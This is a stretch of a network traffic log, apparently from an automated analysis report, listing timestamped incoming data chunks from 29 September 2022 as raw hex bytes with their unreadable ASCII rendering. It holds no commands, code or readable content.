                                                                                                                                                    2022-09-29 12:59:12 UTC16864INData Raw: 69 4b b2 69 96 f6 c5 92 6c 54 e6 4e 24 db a3 a4 03 0f 8f 74 04 fd f4 0c 57 f8 cb 90 3f 02 46 f8 92 e2 49 b7 96 d3 55 18 59 7f 6d e8 ad c0 b7 37 a4 9f c1 0d a1 5e 92 7f ac 23 d2 a8 23 b8 e2 54 9e 14 3c 60 c8 ee d3 cc 16 dc 9e b3 25 8c 89 39 f1 36 2a 29 55 a0 a5 c0 46 1f 38 a1 d1 eb 59 03 c3 46 77 5a 37 af c8 7c 96 22 23 4b 43 5d e1 14 18 7f 93 f8 ca e8 9c ff 74 6c 8d 0a 59 92 93 16 86 e4 ef e3 1e 1a 40 50 93 03 3f 78 14 15 01 0f 84 1f 3b d4 94 57 80 b3 7d de af 6a dd 7d 99 1b ef 18 d1 67 4b 75 8b 34 c2 3e 1a 43 8a 48 77 8e c4 74 d2 8b 05 8c e8 0c ce 12 89 d3 60 93 33 a5 f7 70 0c 6c ee 5e 68 40 da 15 3a 39 94 de 89 c9 fc 05 f3 ca cb 79 d5 56 bc d0 29 ae 69 c0 04 5a ea 9d 16 19 9a 1c 8e db 27 74 34 1e 74 e3 69 61 6a 04 5f 25 5d cf 1c cb 4f 2a b0 bf 14 60 8a
                                                                                                                                                    Data Ascii: iKilTN$tW?FIUYm7^##T<`%96*)UF8YFwZ7|"#KC]tlY@P?x;W}j}gKu4>CHwt`3pl^h@:9yV)iZ't4tiaj_%]O*`
                                                                                                                                                    2022-09-29 12:59:12 UTC16880INData Raw: ab 7b b7 bc 7a cd 84 cf d4 8a d4 d3 b3 64 04 8e 3e 90 a6 c9 08 2c a9 30 77 f3 e7 d4 2d a9 9d 72 74 8e 9a 8b 3b e6 2e 4c 3b 86 5b 70 f3 ea 44 c1 91 88 18 b2 9e f1 7f b0 7e 77 6f 28 4d 6b 4b 5b 05 d5 29 87 6a 8a 21 bb 31 8d c1 cf 90 37 ae 5b d7 4a 15 62 0e 6c 7f 05 db a5 74 73 3b 44 26 d2 ed 87 7d 0c 0b 59 86 9a 88 3e 24 06 93 0d e1 47 1d 70 4c f6 44 7c b4 b3 8d c0 3c bf 16 a9 76 fb 73 a1 03 08 21 05 e6 20 4a 29 31 52 b4 9c 1a d6 ec a1 27 5e d8 24 89 10 8e a2 0f d5 36 fc 4d db c2 dc db de f8 ca 7a 21 73 80 d5 d4 ea 67 fd 7c dd fe c3 ba ba 8b 39 e0 c1 ec 2a 19 ce e2 50 f9 e6 bf 3c f7 b5 53 37 d4 3c 4f 01 78 b7 4a 21 54 0d ae cd 3b ad cf 1c 66 4c 52 29 87 bc f7 11 d6 14 b2 26 56 4b d6 a3 74 47 9c 25 bb 8f 8b 20 d2 b9 b4 03 c9 86 e5 c1 89 fe bf b8 34 9e 41 9f
                                                                                                                                                    Data Ascii: {zd>,0w-rt;.L;[pD~wo(MkK[)j!17[Jblts;D&}Y>$GpLD|<vs! J)1R'^$6Mz!sg|9*P<S7<OxJ!T;fLR)&VKtG% 4A
                                                                                                                                                    2022-09-29 12:59:12 UTC16896INData Raw: f6 b3 ab c8 79 e9 52 f1 b5 9d a8 da 9d 0d 2c 52 ba 9b e5 32 be 92 8e a9 54 bc eb 6e 92 b0 52 04 8d 72 98 07 c2 ca 26 26 f5 30 cb bb b2 4d ff 0b 1c 83 c3 2f 62 1a b8 40 2d 6d f8 f1 67 9d c9 4a b2 e9 06 f0 4a 77 00 24 06 51 5c 3f 77 e7 d3 9e 41 73 9a 21 4c 4f 10 65 6f ad 18 92 21 2b 6a 57 f2 86 3e c8 b9 0c 8a e4 dc d0 29 50 95 a4 18 74 ff fb dc b2 30 99 d0 f6 ea 9f 74 5e e6 f5 06 dd 97 02 29 3a f7 03 5a 87 f0 f7 9f ef 15 08 2c 25 9a 20 48 eb e5 d8 0c a6 4f 4e 74 94 f7 aa ab 0a 2e 8d 1a f6 a4 fa 79 54 f4 12 91 90 7b 43 8f 9c b7 c7 3c 3d 73 8e fa 33 b0 35 7e 8a 98 fe c6 20 f9 b6 63 d8 ae e5 5d ee bb 94 2f f7 1c 70 36 97 7d 9f e6 f4 d7 af 76 31 80 c9 15 99 69 73 23 fa e6 d6 09 23 0f 31 5f d6 ac ad b4 03 e4 25 a0 7c 57 54 23 2e 59 29 c8 7a c2 95 ea ba 67 b6 e4
                                                                                                                                                    Data Ascii: yR,R2TnRr&&0M/b@-mgJJw$Q\?wAs!LOeo!+jW>)Pt0t^):Z,% HONt.yT{C<=s35~ c]/p6}v1is##1_%|WT#.Y)zg
                                                                                                                                                    2022-09-29 12:59:12 UTC16912INData Raw: 5d 95 ff 84 9d 34 f6 b7 75 0d 66 16 cb 25 00 cd 2f e5 50 27 fc aa cf 28 d1 bc a4 13 2f f5 71 b4 ee 96 ff 89 29 a1 59 32 b9 f5 e6 f4 50 39 c3 af b9 3f a3 b4 c7 10 c3 9d 23 95 c3 93 60 e6 d2 17 95 70 70 59 62 82 d8 b2 62 52 3e ae 1f 45 6d ca e4 a6 99 3e 76 a2 0e e1 41 41 4e f3 a8 f2 98 93 1a 7e 8e 28 ab fc 7b 8d 5e a1 84 7f 18 88 3a 66 81 e4 2c ac be 46 41 5a 3e f5 e4 67 d8 14 c1 17 bf 5b c1 41 e0 21 a0 2b ef 13 1e 43 76 5f e2 19 24 78 0c d7 0c c3 36 6a 05 63 e3 8c 18 a0 a5 d9 e9 55 d8 d7 4f 59 72 d7 a3 e6 1a fa da e0 4a b9 61 d0 dd 63 1c 50 4b e3 b8 9c 1c 72 77 6c 16 00 40 a4 2e ec 7e 94 37 0c e7 22 1e 7c b0 e2 99 76 86 2a f0 fc 3a ff fc a5 1a 62 92 2a ba 26 a2 b6 65 7e d6 98 53 04 d3 f9 cd db 4a 8b fc c3 f6 2e fe 91 8a ce a0 41 93 ba 26 73 75 eb 83 36 4b
                                                                                                                                                    Data Ascii: ]4uf%/P'(/q)Y2P9?#`ppYbbR>Em>vAAN~({^:f,FAZ>g[A!+Cv_$x6jcUOYrJacPKrwl@.~7"|v*:b*&e~SJ.A&su6K
                                                                                                                                                    2022-09-29 12:59:12 UTC16928INData Raw: a4 f8 cc 49 95 ce 91 34 1f 75 28 32 a9 87 7e 1d bc 9f ef c3 c4 cc e0 3a 57 fd 13 8b 6f 12 c6 04 ed 30 da 4b cc 1e 6d 2b b6 9b 77 f7 0e 9f 2c 0c 59 1c 91 04 4a bb 5c 90 4d e8 e9 b6 a0 fa 4e 0d 1b f2 f1 3c b3 92 85 da 78 f4 a0 f0 13 bc fb a3 23 9e d7 9c 89 bf 19 9f c2 5b 1b 5a ab ec 57 15 65 8b 9a d7 db 56 98 15 03 60 f8 93 db f0 90 5b f1 09 41 4a ce 41 bb fb e5 16 64 61 10 b6 52 b7 10 db 5b 9e 2e 2f bb 8b 1c 3d 61 21 ff aa d0 b0 f1 17 d8 92 fe c7 af d9 b1 5c 68 16 1e b0 b0 f4 1f d5 6f f0 54 d6 6f 82 6e d2 2b c1 33 d8 a4 48 38 e6 51 9c 31 e5 84 a5 4b 55 b3 6d a4 5b 2a 6e a2 3f 46 99 89 e7 e5 02 85 a5 96 5c 4b bc d7 8a fe 90 53 bf d6 02 1f 66 79 d2 74 13 5b 33 9a 92 0f 43 c5 7f 9a 6a 2c 4f 1a df 4d 4a 09 18 b2 ce b8 43 25 f6 89 61 ef af 2b f1 93 7c 68 ba be
                                                                                                                                                    Data Ascii: I4u(2~:Wo0Km+w,YJ\MN<x#[ZWeV`[AJAdaR[./=a!\hoTon+3H8Q1KUm[*n?F\KSfyt[3Cj,OMJC%a+|h
                                                                                                                                                    2022-09-29 12:59:12 UTC16944INData Raw: db 2a dc 5c 52 5f ba a9 75 ee a6 e0 f4 5b ba 15 1e fe d8 7e cc 56 17 c0 ad a2 24 b1 26 7c d9 43 5a 23 72 7f 18 3a 10 87 e9 cf ff 0e ff 67 9f 8d e4 55 86 e1 dc de 53 ba 1b 15 f5 f5 fd 55 8c f0 96 10 2c a3 30 83 0f 7e 08 33 08 0b a0 59 91 e1 55 35 e4 f0 30 11 3a bd c3 a0 69 ce 22 ae f0 1d f2 83 7a f9 aa 08 58 b6 60 52 90 24 f1 3b 50 13 27 53 09 23 a6 35 6b 70 80 4c 18 37 3c db b3 ef e9 ba ef 3f 1a a5 52 db 57 b8 5b 46 0b df 59 d5 5a 68 b6 24 ca 16 14 1f d0 e5 51 ca 86 8e 25 7f bc 44 4a 30 62 cf 80 b0 2a 64 53 35 c3 52 fb bd fc dc d5 4a cc 21 31 1a d1 aa fa 5f 82 91 14 f6 31 ce 53 d8 e9 ad dd b3 3d 84 e8 61 be be de f2 c9 68 5e 63 12 7c 95 20 bc 02 0c 95 89 e2 31 de c2 0e e0 2f ff 56 37 b1 8b 31 88 68 02 a8 9a 9f a9 cc eb 3c 87 91 e7 39 47 48 d4 b4 55 eb d4
                                                                                                                                                    Data Ascii: *\R_u[~V$&|CZ#r:gUSU,0~3YU50:i"zX`R$;P'S#5kpL7<?RW[FYZh$Q%DJ0b*dS5RJ!1_1S=ah^c| 1/V71h<9GHU
                                                                                                                                                    2022-09-29 12:59:12 UTC16960INData Raw: 79 98 b7 6a b4 55 a4 0a 27 07 46 78 fb 44 68 49 fb bf 5d 02 23 e6 0b 2c 1c 06 59 2b 2b 4c fe 0a 94 2a e0 f5 17 64 36 f8 8e 39 88 ee f4 e7 37 d2 bd 43 ba d9 7b 70 8e b8 6e 32 9c 16 35 77 0e f7 d5 50 8f 60 57 61 11 f2 b1 18 68 74 b3 a9 62 a2 da 79 e3 60 7c 80 77 0d c5 b0 01 d2 bb e6 41 43 da 57 38 25 94 91 43 68 1e 35 84 0a 84 40 d1 c3 f3 c4 f0 98 de 73 e0 ae 91 14 25 15 51 f2 b5 a7 7b 6d 2b 50 a7 c4 63 56 53 ec 9a e5 ce ab 29 a9 c6 40 69 8a 71 5a ae a5 49 bc ff fa aa 82 7f 82 65 b8 b6 15 60 05 4c c2 4c 8f cc 38 b7 a0 61 0a 5e 31 27 eb f7 9a 15 58 71 30 75 dd c9 2d d1 a2 a8 04 55 6a cc 04 3a 8f 29 72 cc 36 44 23 f9 e0 62 f5 c7 fd 4a 33 ee 4d 89 d6 a5 36 8e 16 bb 57 f3 c7 d0 9e b5 a9 02 46 20 62 59 35 49 3b f7 44 92 64 9a a6 88 57 b2 cd cb 76 f8 0e 60 4d 19
                                                                                                                                                    Data Ascii: yjU'FxDhI]#,Y++L*d697C{pn25wP`Wahtby`|wACW8%Ch5@s%Q{m+PcVS)@iqZIe`LL8a^1'Xq0u-Uj:)r6D#bJ3M6WF bY5I;DdWv`M
                                                                                                                                                    2022-09-29 12:59:12 UTC16976INData Raw: b3 d8 09 e3 41 f2 e9 59 ba c8 1f 97 fa ef 67 00 bf 5c ed ad 11 64 16 28 11 87 80 33 ca 17 d8 be c8 be de 62 da 01 c6 2d c6 15 9e 86 db af 55 12 77 df f1 bc 46 9d 34 a0 64 b2 04 ea e4 f7 d2 63 5e c9 d0 62 c2 bb af b2 7c 67 f1 d2 0b 63 15 45 0b 72 14 90 fd 34 e8 88 e0 f7 4f e0 cd d1 37 da b9 22 b3 b0 85 03 07 b8 b2 a6 98 db c9 ea f0 49 f4 8d c6 cb 85 07 bc 9b 36 a2 97 b9 7c ee 63 18 b9 2c d8 c2 e7 85 b9 46 ca b4 75 32 cb fd 8b 23 ef 0f 11 a5 af 49 19 12 0c 77 b4 31 6d 13 bc d0 96 63 2d 77 7c 1a 90 c7 1c 0d b6 59 ca 1b 77 05 fc 96 99 1b c5 a1 f1 5c 2a 99 ac 39 31 ed 8a ab ab 2a c1 26 16 dc 4d 8b 6b ad d2 de 42 ea f9 e7 da af 19 4d 05 a0 e0 46 23 ec 5c 8b 2f a8 3e d8 f6 48 00 e7 4d 0d 9a 1e e8 29 4c f4 61 0c 49 5a 1f 73 5b 57 53 a3 fb 5b 13 db 8e 78 c1 44 2d
                                                                                                                                                    Data Ascii: AYg\d(3b-UwF4dc^b|gcEr4O7"I6|c,Fu2#Iw1mc-w|Yw\*91*&MkBMF#\/>HM)LaIZs[WS[xD-
                                                                                                                                                    2022-09-29 12:59:12 UTC16992INData Raw: 14 81 b9 dd 90 ec c6 6e d4 6b 73 12 d8 92 59 00 2e c0 f5 f6 95 71 0e 15 c8 d4 a1 41 13 16 b1 fa 8b 49 7d 0d ca 28 b5 4f 23 25 f5 ca fc 77 8d 00 a2 31 bd b0 be 98 94 8a 3b bb fd 07 91 df 49 e5 ad f1 81 6a 2a 66 52 58 b2 e9 80 2e e5 cd 29 03 81 dd c6 f2 9a e0 52 b4 9e 2f 20 39 0b 91 1a c2 d7 d2 f6 c7 45 63 b1 50 8c 5d d5 6d 1d ac 76 11 7e e7 4e c5 d8 5b c4 64 55 3c 08 27 43 05 0d e5 08 33 94 a4 ea 45 7d a9 8d 6a d2 c2 86 cf a7 a8 aa 9b e3 15 03 65 6a e3 0c 6b 22 9e ad e5 6e b9 43 ac db 6b e3 c5 97 85 16 92 9d 99 0b d1 8e ff f5 0b da 8b f9 8f d7 08 62 dd 5f ec 37 55 e8 17 8b c3 0c 85 b7 8f 94 eb b7 f9 d3 a5 88 31 d2 ed 76 51 43 94 db 95 dd db 31 30 51 0a 17 6a fb 13 48 03 0d 25 1a 6c 26 c1 9b b2 6c ba f0 1d d1 ca 87 94 ab 9f 6a 74 2b 7a 91 ab 46 e5 3c e6 48
                                                                                                                                                    Data Ascii: nksY.qAI}(O#%w1;Ij*fRX.)R/ 9EcP]mv~N[dU<'C3E}jejk"nCkb_7U1vQC10QjH%l&ljt+zF<H
                                                                                                                                                    2022-09-29 12:59:12 UTC17008INData Raw: b6 95 55 38 2f 0e 83 2c 15 80 07 53 a1 2a 51 cd 46 0b 10 5b ab 14 07 cd eb 22 73 c7 2c 71 56 b1 16 80 6e 0f f7 f4 40 5b 1a e0 18 ac ea 09 a2 21 95 e0 b5 24 78 66 0b ea 4a 68 2d 86 e5 24 8e f5 e3 ba 7c 54 c8 19 b3 3b be 26 67 52 82 ef f8 fc 78 29 7b b2 91 eb e0 db 5b a2 75 22 c1 1a 7a 3a 5e 14 d4 4a aa 27 08 dd 55 3c b9 6b b4 95 74 64 bb b8 f8 21 1c 8a 4b 1c 00 7b e1 7c 7f 89 9f 29 16 8e 53 ee 4a 20 6c 2d b0 4f 74 20 65 c5 06 dc 47 70 95 a1 22 bb 74 1f d3 2c 09 2c 1c 75 11 a2 70 2e 16 2a 22 12 08 32 92 6e 04 b9 4d c7 2f df 87 be 41 b0 30 f0 96 b8 17 9a 0e 2c 40 ed 04 2b b4 25 84 91 fc 5b b9 dc bc ba 6f 6b cb 53 e9 b9 f4 67 18 87 94 6d a9 c4 74 c6 98 7a d0 0c ba 32 69 d0 45 c1 04 d9 44 66 f1 5b f1 09 d2 35 9b 83 98 fe a6 74 f0 b2 4f d6 d0 03 ea 98 0c 3b 38
                                                                                                                                                    Data Ascii: U8/,S*QF["s,qVn@[!$xfJh-$|T;&gRx){[u"z:^J'U<ktd!K{|)SJ l-Ot eGp"t,,up.*"2nM/A0,@+%[okSgmtz2iEDf[5tO;8
                                                                                                                                                    2022-09-29 12:59:12 UTC17024INData Raw: d1 b1 84 04 58 36 8a 86 36 49 e8 bd 95 6f 90 41 53 a1 33 c5 09 75 73 f9 f2 12 b9 ca fa 9a bf 80 ff 26 68 f4 ba df 05 b8 ac e3 11 df 05 a1 ea 03 23 34 74 99 0f f5 3e c8 2e 93 40 bb ad 2d c2 f9 f5 0e 2a 5f 5b 91 3f 78 55 7e b9 d7 f0 cd 65 b5 fd f6 0e 56 d8 c7 5e 19 67 9e 84 7f 20 0b af 8c dc dd 08 e8 1e 44 88 2f bb 42 72 e5 f0 91 5a 59 7b 58 a6 4e e4 d0 cc 42 62 36 2a 3c 41 3d e6 b7 26 44 8f f0 92 9d 90 7f e8 86 97 b7 69 0b 5c 14 fa 53 8b 11 aa 19 f2 3b a3 47 2c 4b 13 ac 09 32 9c b9 a3 ff c0 8e 23 85 c5 85 42 97 71 be 64 64 2a 4f 25 a7 76 7a 6c 3f c1 8d 45 84 4d f2 18 bf dd 74 01 81 f9 c1 1e 45 20 40 ad 53 17 eb 2d 40 6f 9c 04 0d 23 e5 0c fa b5 b8 2d a8 28 9b d9 89 72 f9 85 41 a3 79 39 d4 84 54 a6 4b df d3 09 ea 7d ca fe 35 79 f7 ab df 3a 04 64 fc 20 a5 b0
                                                                                                                                                    Data Ascii: X66IoAS3us&h#4t>.@-*_[?xU~eV^g D/BrZY{XNBb6*<A=&Di\S;G,K2#Bqdd*O%vzl?EMtE @S-@o#-(rAy9TK}5y:d
                                                                                                                                                    2022-09-29 12:59:12 UTC17035INData Raw: 8a d3 5f 46 3e 0c 65 e3 f5 21 c1 25 49 59 12 43 68 d3 d2 43 54 68 fe 3a 3d a0 ae 43 38 de 2f de 6b 80 5d 9b 22 f8 b8 4c 19 b8 d2 16 b7 9a 4c 1c 13 f1 e7 d6 f2 94 92 46 00 69 fe f4 21 22 07 23 ef c6 79 e2 e7 47 cc c6 d0 6b c1 99 85 d8 ba 0e 5e e3 a1 7b 8b 8a 96 53 de e3 8a 6c 05 d0 05 ce a3 87 fa 17 cd 52 cb 12 b4 ad 33 31 0f 05 1e 78 12 1e 49 f2 d8 7c 51 ea b6 09 54 4c 7c 9f 76 a8 d8 56 00 7d 01 91 24 25 8c 17 69 0e 4e 52 6c f0 18 64 75 66 a0 2b bd 9d 2e fd 52 7c ce b0 54 8d 09 35 24 28 53 3c f9 15 7a 39 e4 e9 1d 7c 99 f1 74 90 f3 37 91 f0 79 94 25 49 ee b7 e1 68 86 89 17 75 3d 6b 25 97 6f 64 04 ac 12 38 09 4e 0b db 1f 6b 25 b2 30 69 63 9a 3a 75 e1 87 d6 ec 90 b9 b5 b2 92 8d c3 ed 4c 77 fc 49 40 ac 9c 57 4e 07 35 49 e1 5c dd 46 f6 3b 71 56 a5 87 2a 53 02
                                                                                                                                                    Data Ascii: _F>e!%IYChCTh:=C8/k]"LLFi!"#yGk^{SlR31xI|QTL|vV}$%iNRlduf+.R|T5$(S<z9|t7y%Ihu=k%od8Nk%0ic:uLwI@WN5I\F;qV*S
                                                                                                                                                    2022-09-29 12:59:12 UTC17051INData Raw: c2 ed 6b 4f 86 1a 2b dd 8d fd 9d 94 71 e4 23 f3 12 4e 39 8a 0b 01 56 41 fb 37 32 d7 ba bb 63 a9 6f d0 e5 e3 d8 e0 b3 34 b6 41 84 80 ce 50 ec 00 da 33 43 de a6 99 22 db 24 d7 cd a9 73 39 b9 f2 ef aa a1 57 37 ac 03 83 e0 ef af 21 ea 9a 1b d8 c1 e6 79 fc aa e3 60 5f 55 c9 dc e8 12 ba 5a dc 70 72 76 d9 47 4f 44 c9 f9 9c 03 c6 6b 61 67 43 f7 cd 12 eb 25 8f c4 39 f3 6d 38 d7 70 91 72 a8 14 d8 4b e4 69 00 b5 a6 ce 1e a1 1b 87 a2 c0 61 70 6b 48 31 ec e5 78 28 b5 03 d7 84 a9 85 63 b1 15 b8 25 e8 d1 19 41 97 33 05 a3 64 90 77 b4 98 c2 37 bc fe e0 62 e6 b2 e3 05 76 31 37 99 95 d9 34 81 0b 97 75 72 1d d7 a7 51 6b 93 49 d1 62 e4 39 13 e1 51 55 79 fc 26 a9 4c 80 b6 05 5a 90 e4 3e 67 23 14 49 23 da 3e dd a8 b3 c9 84 0a 61 99 0f 22 d4 4f e6 e6 0e d6 a6 96 e9 b4 3e ed 41
                                                                                                                                                    Data Ascii: kO+q#N9VA72co4AP3C"$s9W7!y`_UZprvGODkagC%9m8prKiapkH1x(c%A3dw7bv174urQkIb9QUy&LZ>g#I#>a"O>A
                                                                                                                                                    2022-09-29 12:59:12 UTC17067INData Raw: 25 6b 25 19 f4 97 35 b1 2d 68 a9 47 86 c3 60 1b 97 d3 4b 57 8e 77 e0 b9 50 b8 d0 0b 25 88 61 ec 8c 71 ea ed c0 e6 c7 9e c1 9e 92 80 e7 f0 59 5b 28 fe c9 d9 0b d5 d8 72 ae a7 ea fa d5 01 f9 a4 f2 46 a8 c9 31 35 fc 99 89 f1 fe 05 c8 82 12 2e 77 25 be f5 89 2d b1 60 4a 45 18 31 14 5b 84 16 62 a6 51 62 e7 06 4c 1b 7c f0 1b b2 2c 12 21 91 89 78 0e 98 48 8b 15 0c 4b 1c 0b e5 4b 23 d2 f2 17 f8 10 d4 6f 8d c2 7c 58 ef 16 71 85 53 c0 da 2d a2 b7 e4 e1 c2 09 5d ad e0 d1 95 f7 fa 5f 73 81 89 a7 ad 5e f2 be 37 ea 90 a3 0e 51 df 85 c6 f5 e5 be 2d 2c 9d 1f 1a 05 9b 8d 48 b4 02 fb 42 cb 74 3c 5e 66 ad 2a 68 9f 12 55 be 37 77 ee 41 e6 16 1d 94 cf c7 26 21 58 d0 04 59 03 2b 69 07 86 18 f1 f0 ac ff 48 58 55 25 1b 4f df 80 e2 b1 d4 a8 9e 90 38 f2 d7 60 fc 90 1f ea e5 f6 67
                                                                                                                                                    Data Ascii: %k%5-hG`KWwP%aqY[(rF15.w%-`JE1[bQbL|,!xHKK#o|XqS-]_s^7Q-,HBt<^f*hU7wA&!XY+iHXU%O8`g
                                                                                                                                                    2022-09-29 12:59:12 UTC17083INData Raw: 8a a1 14 d8 a3 0e 9e 56 6d 23 13 db 72 d8 58 c6 6d e0 cc 7a e8 52 dd dd 09 b9 db a6 df 57 74 a5 6e b6 77 3f aa 19 86 ad 66 02 50 78 83 45 57 0e 6a a6 84 bc a4 82 f6 76 07 02 91 f6 9f 9d 4b 1f db 9b 05 bb e1 22 f4 e0 c7 31 1d 54 67 c0 71 6f ab 7f b6 8d ef fb 6a 34 fd 07 7c 3b 1b 34 f4 1e 99 da f8 2d cb 56 ab 0d d9 b7 88 d9 6b 27 28 2d 58 17 de 2d 37 d5 18 9c c1 26 7a a5 51 d9 43 93 ac b8 a2 50 22 9b 63 0c 15 fe cd 21 1c 61 8c c5 cd f7 b0 16 5b 2e 8e 3b 23 c3 17 81 a2 c8 11 00 26 34 cf 6e 98 4b 94 0f f4 df 77 23 4b 08 ca 88 c3 ad 31 f4 a2 d7 71 ea 97 c2 06 e6 21 01 d5 20 ec f1 45 4d d1 05 6f eb 4d 47 a1 72 69 7b 71 74 7f b1 5e 50 5c 2c 93 ec da 88 3b ee 41 b0 c4 6a 53 a1 eb ec bc 06 fe 53 9c d7 dc 95 83 17 4c de 0f 52 36 b6 97 7c ab 88 85 08 8d 8d c2 63 0b
                                                                                                                                                    Data Ascii: Vm#rXmzRWtnw?fPxEWjvK"1Tgqoj4|;4-Vk'(-X-7&zQCP"c!a[.;#&4nKw#K1q! EMoMGri{qt^P\,;AjSSLR6|c
                                                                                                                                                    2022-09-29 12:59:12 UTC17099INData Raw: 0f 59 06 9f ca 8b 3d 88 48 2d 55 bb 6a c9 59 be 19 7c 0d 34 04 1c 70 bb b6 d0 db bf fc 5e 52 97 52 4a f5 fc 74 f8 5a 15 0d d9 e1 5e ff 71 bc f4 3b 20 00 83 f8 a0 61 1a 79 a0 22 94 c3 18 45 e8 e4 98 26 52 a5 05 5b 04 c4 24 87 4f 87 fe 6f 39 fd dc 61 61 48 89 2b 33 a5 34 3d 80 f4 dc 06 3e 51 5d 08 c2 7a cf c3 9f 99 0f 05 57 ac 0f a1 59 5b ed a6 51 db 20 bb 62 5a a6 9a 63 e5 b4 6e 2d 49 d0 1f f4 24 0f 4a 68 49 25 d8 62 5f b4 7c 67 79 b8 aa 79 0e b0 be 08 a3 8f 0f ed aa bd ed a8 15 21 b8 28 a6 54 d4 0b 47 0f 27 5d 66 b1 7e 63 27 00 f8 ad 66 a8 84 a3 af f3 b4 78 3c 4a 85 db 0b a2 f7 01 fa 52 6c 35 96 81 ea 33 37 0b 2c a1 5f 90 83 9a 14 9b e9 56 8d 49 de f3 78 b2 8b e2 ff 01 c8 e5 b1 ec 92 5c d4 6b 25 3b 8c 87 33 5a 9b 9d e2 d3 4d 55 be 03 a9 8d 04 4d 35 e1 5d
                                                                                                                                                    Data Ascii: Y=H-UjY|4p^RRJtZ^q; ay"E&R[$Oo9aaH+34=>Q]zWY[Q bZcn-I$JhI%b_|gyy!(TG']f~c'fx<JRl537,_VIx\k%;3ZMUM5]
                                                                                                                                                    2022-09-29 12:59:12 UTC17115INData Raw: 07 db f3 e7 73 06 d1 a7 a1 60 79 d7 fd 12 70 53 e7 56 58 73 a3 d4 f0 13 88 8f 4f b9 cf 40 fc 69 a2 5e be 8e 14 d6 7b 8b e6 00 2a 4a 6c 3f c7 f5 0a fe e1 69 02 99 a6 b2 c1 10 21 c7 c2 89 2b dd b5 0f 3d 40 7a b1 a0 76 41 95 61 e5 ea df db af e8 22 b2 00 64 5b 26 15 c6 3d 76 0e 66 1b c4 e2 57 cd be ff be 08 8a 63 86 fa 64 d0 3f 56 53 bd 47 40 83 d7 0c 4d ee 32 50 29 2a dc 6a b2 83 69 c0 ca 07 a8 41 2e f7 32 41 5f cd 73 64 48 a0 75 f1 3c 61 17 94 4d be 49 43 3c 28 e6 81 95 0d 1a a3 d8 19 c5 31 01 b5 f5 28 6b 39 10 c3 2a 5f f4 3d 2c b6 82 6b 81 5e 74 b1 c6 7e 88 50 ce 7b ad c1 d3 57 49 f8 e5 89 93 e6 dc 04 ee 03 6f 8c f3 67 ed 89 be 4d a4 9b 00 bc 4c 6f 61 fa a7 1a 8f f0 28 ac 2e 4e 5c f1 60 0a 3a 1b 7e 1a 04 50 1d 11 dc 9d df a1 8d f7 af e3 c7 8b bb 98 f0 0e
                                                                                                                                                    Data Ascii: s`ypSVXsO@i^{*Jl?i!+=@zvAa"d[&=vfWcd?VSG@M2P)*jiA.2A_sdHu<aMIC<(1(k9*_=,k^t~P{WIogMLoa(.N\`:~P
                                                                                                                                                    2022-09-29 12:59:12 UTC17131INData Raw: 76 96 12 1e eb 44 18 d5 68 54 cd 2c d2 f7 0c 23 14 83 3a 4c e3 e8 37 33 b3 8e ec df 07 6d d2 2c d6 73 77 a2 f9 56 f6 cf 3b 26 35 2e 28 11 79 86 82 b8 17 69 ba 2e 3a c9 66 2c bd 0f 27 82 e1 73 d2 aa a0 04 6d 5e fc e0 05 95 be 7c 56 c4 c0 84 36 9f 33 42 73 72 31 9b 84 f2 46 c2 49 12 3f a1 cf 5e b2 ed 00 a2 08 d6 81 f5 e7 07 e5 9f 81 78 c8 29 a3 23 0b 18 6a c3 ea 0c 88 ae 32 3b fe 63 68 a2 53 01 fa a5 63 71 e3 dc d5 da 88 35 36 c9 81 db e9 db d9 3e 07 61 0b 4f cd 19 fd 62 db 63 8a 17 10 3b 73 bd cb 93 a8 9c 6f 91 f4 cd fd ef 06 69 25 20 16 30 c1 42 cc 69 8e 8a 96 1d cc d5 0f 30 bb 73 f6 ab e6 30 d2 a0 17 98 f3 c2 1f 5f ba 90 0b 1e 29 3c fc 5d ef 7a 87 d1 1a f4 1a 21 8e 1b 79 78 1e 71 38 4a 70 39 04 b1 f7 a7 88 6f 3d 76 b4 f4 e5 58 c4 47 04 f7 da 3e d3 31 74
                                                                                                                                                    Data Ascii: vDhT,#:L73m,swV;&5.(yi.:f,'sm^|V63Bsr1FI?^x)#j2;chScq56>aObc;soi% 0Bi0s0_)<]z!yxq8Jp9o=vXG>1t
                                                                                                                                                    2022-09-29 12:59:12 UTC17147INData Raw: b9 32 85 f7 30 8f c2 99 3e ad c0 35 9a 3e 9d 2f 7f 79 f1 f3 e1 04 fc 31 21 b4 7c 17 58 4a e1 42 2c c2 3a 5c b4 76 f1 ea 79 cc 4c 2e c6 7d 9a 47 37 eb ba 29 0b d1 bf 77 bf 91 0a 13 39 02 74 c3 23 92 a9 9b b1 ff fd 3e ff 6f d7 eb 9a 8d 9e 2e 9b 70 73 a4 4e 4e 54 a0 fb ea c5 b7 90 1b dd 0b 6e 41 93 0e b9 71 8d 3c 9e 77 23 e0 27 ea 60 a8 a9 96 1c 42 ad bc 69 8d 02 83 5e b8 d4 f6 aa 30 b1 45 52 dc 7b 43 ca 0f 79 a2 52 9b 14 ba 22 2b b9 61 2e 73 ec 7d 64 7a d1 08 37 83 a1 59 ee ca ce fd b1 cc b5 ae c4 5d 2c aa 54 40 cb 05 f9 7d ce 8b 80 b6 b8 8d 2e 9b ee ee bf a5 ef 49 b8 5d f9 6e 3a e3 de 29 9e bc da 00 00 ac c0 e6 e2 87 a9 e8 3a 94 67 78 e3 ec a4 3e 7f 01 1d 83 3a 6a fa 16 99 7b 72 a8 ac 7a 36 46 13 be 2b 24 02 12 dd 16 e8 91 5b 5b b1 2a 17 80 09 52 d1 48 85
                                                                                                                                                    Data Ascii: 20>5>/y1!|XJB,:\vyL.}G7)w9t#>o.psNNTnAq<w#'`Bi^0ER{CyR"+a.s}dz7Y],T@}.I]n:):gx>:j{rz6F+$[[*RH
